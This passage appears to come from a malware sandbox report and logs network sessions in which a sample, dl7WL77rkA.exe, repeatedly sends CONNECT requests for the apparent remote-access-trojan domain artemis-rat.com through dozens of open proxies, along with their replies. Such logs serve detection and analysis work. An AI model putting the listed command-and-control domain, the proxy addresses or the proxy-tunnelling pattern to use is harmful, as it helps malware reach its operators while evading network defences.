                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            110192.168.2.550004103.190.54.141803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.000951052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            111192.168.2.550122116.203.28.43803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.005151033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.322881937 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            112192.168.2.55010020.24.43.214803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.008583069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.344680071 CET319INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 17
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            X-Cache: MISS from cdn-fintech.info
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                                                                                                                                                                            Data Ascii: ERR_ACCESS_DENIED


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            113192.168.2.55009951.161.131.84492023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.008835077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
114 | 192.168.2.5 | 50130 | 94.23.83.53 | 55806 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.023267984 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.701680899 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
115 | 192.168.2.5 | 50001 | 41.65.236.37 | 1981 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.028271914 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.889205933 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.217377901 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.967825890 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.311393976 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:53.717600107 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:59.108321905 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
116 | 192.168.2.5 | 50144 | 155.185.15.56 | 3128 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.034203053 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.368597031 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
117 | 192.168.2.5 | 50214 | 142.44.194.14 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.037208080 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.258440971 CET | 443 | IN | HTTP/1.1 405 Method Not Allowed
Date: Mon, 11 Mar 2024 02:30:38 GMT
Server: Apache/2.4.57 (Unix) OpenSSL/1.1.1k
Allow: HEAD,GET,POST,OPTIONS,TRACE
Content-Length: 224
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for this URL.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
118 | 192.168.2.5 | 50116 | 94.177.106.178 | 2324 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.055336952 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.424308062 CET | 309 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.22.1
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 157
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
119 | 192.168.2.5 | 50238 | 132.148.167.243 | 28040 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.057851076 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
120 | 192.168.2.5 | 50236 | 103.152.112.167 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.066387892 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.240416050 CET | 309 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.23.2
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 157
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
121 | 192.168.2.5 | 50088 | 5.34.201.244 | 3128 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.066994905 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:56.227560997 CET | 39 | IN | HTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            122192.168.2.55023038.162.25.4431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.071161985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.485634089 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            123192.168.2.55021672.195.34.5841453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.075004101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            124192.168.2.550269104.22.14.48803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.082129002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.236845016 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            125192.168.2.5501668.210.58.56803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.101937056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.408253908 CET309INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.23.4
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 157
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.4</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            126192.168.2.55018654.223.158.8880803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.112514973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.435787916 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            127192.168.2.549786117.160.250.16380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.114576101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.085854053 CET221INHTTP/1.1 403 Access Denied
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-store
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            Content-Length: 43
                                                                                                                                                                                                                                                            Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                                                                                                                                                                                            Data Ascii: You are not allowed to access the document.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            128192.168.2.55025338.162.29.12531283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.129529953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.539990902 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            129192.168.2.550254162.120.71.11803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.130083084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.366755962 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
130 | 192.168.2.5 | 50290 | 104.20.235.179 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.134278059 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.288789034 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
131 | 192.168.2.5 | 50224 | 121.182.138.71 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.137259007 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
132 | 192.168.2.5 | 50295 | 104.20.75.31 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.141138077 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.295747995 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
133 | 192.168.2.5 | 50296 | 104.20.225.218 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.143049955 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.297343016 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
134 | 192.168.2.5 | 50227 | 81.250.223.126 | 80 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.159646034 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.471532106 CET | 805 | IN | HTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 613
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
135 | 192.168.2.5 | 50294 | 51.81.186.179 | 58630 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.173932076 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.654834032 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.217360020 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.326750040 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
